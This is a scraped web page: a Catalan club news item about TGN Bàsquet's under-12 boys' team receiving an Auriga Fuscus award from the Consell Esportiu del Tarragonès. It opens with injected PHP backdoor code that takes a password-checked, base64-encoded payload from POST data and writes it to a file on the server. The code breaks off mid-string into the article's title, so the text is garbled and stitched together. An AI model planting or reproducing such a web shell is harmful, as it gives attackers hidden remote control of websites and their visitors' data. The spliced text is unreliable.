function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'aleví masculí blau del TGN Bàsquet, premi Auriga Fuscus - Tgn Bàsquet Club -

L’aleví masculí blau del TGN Bàsquet, premi Auriga Fuscus

By
Updated: octubre 2, 2015

L’equip aleví masculí blau del TGN Bàsquet de la temporada 2014/2015 ha rebut aquesta tarda el premi Auriga Fuscus pel  seu mèrit esportiu i la projecció que ha fet de la comarca del Tarragonès fora del seu àmbit. Aquesta distinció és, segons, el seu entrenador, Albert Gómez, la culminació d’una temporada brillant i la feina feta de fa anys amb aquest grup de jugadors. “Avui hem recollit un premi que culmina el treball que van començar Àngel Rojas i Miquel Farran. Per a mi ha estat molt fàcil entrenar aquests nois i estic molt agraït també als seus pares pel bon ambient que hi va haver durant tota la campanya passada”. L’aleví masculí blau va ser primer de Tarragona en la lliga federada i setè de tot Catalunya. També va guanyar el Trofeu Diputació del Consell Esportiu.

Els premis Auriga Fuscus els entrega el Consell Esportiu del Tarragonès i enguany la cerimònia s’ha fet a l’Aula Magna de la Universitat Rovira i Virgili. Fa un parell d’anys el TGN Bàsquet ja va rebre un parell de premis Auriga Fuscus, un fet que ratifica la bona línia de treball en les categories inferiors del club lila.

 

 

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *